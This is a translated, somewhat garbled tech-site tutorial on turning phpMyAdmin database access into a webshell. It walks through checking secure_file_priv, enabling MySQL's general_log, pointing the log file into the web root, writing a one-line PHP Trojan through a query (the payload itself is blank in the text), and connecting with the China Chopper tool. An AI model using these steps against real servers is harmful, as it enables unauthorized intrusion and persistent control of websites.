Shulou(Shulou.com)06/01 Report--

This article mainly introduces the use of getshell in phpmyadmin, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand it.

PhpMyAdmin is a database management tool based on PHP and constructed on the host of the website in the way of Web-Base, which allows managers to use Web interface to manage MySQL database. Through this Web interface, it can become a better way to input complicated SQL syntax in a simple way, especially to deal with the import and export of a large amount of data. One of the bigger advantages is that phpMyAdmin runs on the web server like other PHP programs, but you can use the HTML pages generated by these programs anywhere, that is, to manage the MySQL database remotely, and to easily create, modify, and delete databases and tables. You can also use phpMyAdmin to establish a commonly used php syntax to facilitate the correctness of sql syntax needed when writing web pages.

Popularly speaking, its function is to operate the database conveniently on the web page.

When we get the phpmyadmin page of a site, the next step is getshell.

You can claim rights by writing shell, and we need to meet the following conditions:

1. Database root permissions

two。 Know the physical path to the website

3. Database has write permission

Write to shell through the select''INTO OUTFILE' website physical path'

This article is mainly about successful getshell when condition 3 is not satisfied.

Utilization condition: MySQL 5.0 +

The version of MySQL 5.0 + automatically creates log files, so you can change the file location by modifying global variables while the service is running, but you must have read and write permission to the directory where the log is generated.

(it may be more stringent in the Linux environment, because the site directory is one user and MySQL is another user, and the permissions are strictly controlled, which mainly depends on whether the permissions are properly configured)

First, let's test whether the site has write permission.

Execute the sql statement SHOW VARIABLES LIKE 'secure_file_priv'

Sql statement SHOW VARIABLES LIKE 'secure_file_priv' to query and find secure_file_priv

Secure-file-priv characteristics

The secure-file-priv parameter is used to restrict LOAD DATA, SELECT. OUTFILE, and LOAD_FILE () to which specified directory.

When the value of secure_file_priv is null, import is not allowed in mysql. | Export

When the value of secure_file_priv is / tmp/, the import of mysql is restricted. The export can only occur in the / tmp/ directory.

When the value of secure_file_priv does not have a specific value, no restrictions are imposed on the import of mysql | Export

You can set its properties in the mysql-ini file

After testing, we don't have write permission.

Then introduce two MySQL global variables (general_log, general_log file)

General log refers to the saved state of the log. A total of two values (ON/OFF) ON means to enable OFF and to close.

General log file refers to the path where the log is saved.

We can implement getshell by writing a sentence Trojan to the mysql log and then moving the mysql log path to the website directory

Execute the sql statement SHOW VARIABLES LIKE 'general_log%' for fuzzy query

Logging is turned off by default

We execute the sql statement

Set global general_log = "ON"; # Open the physical path under the log SET global general_log_file=' website; # change the log path

Successfully created

Then execute a special query statement

Select''

We enter 112233.php for verification and successfully write to shell

Finally, the kitchen knife is connected to get the site webshell.

Thank you for reading this article carefully. I hope the article "what is the use of getshell in phpmyadmin" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.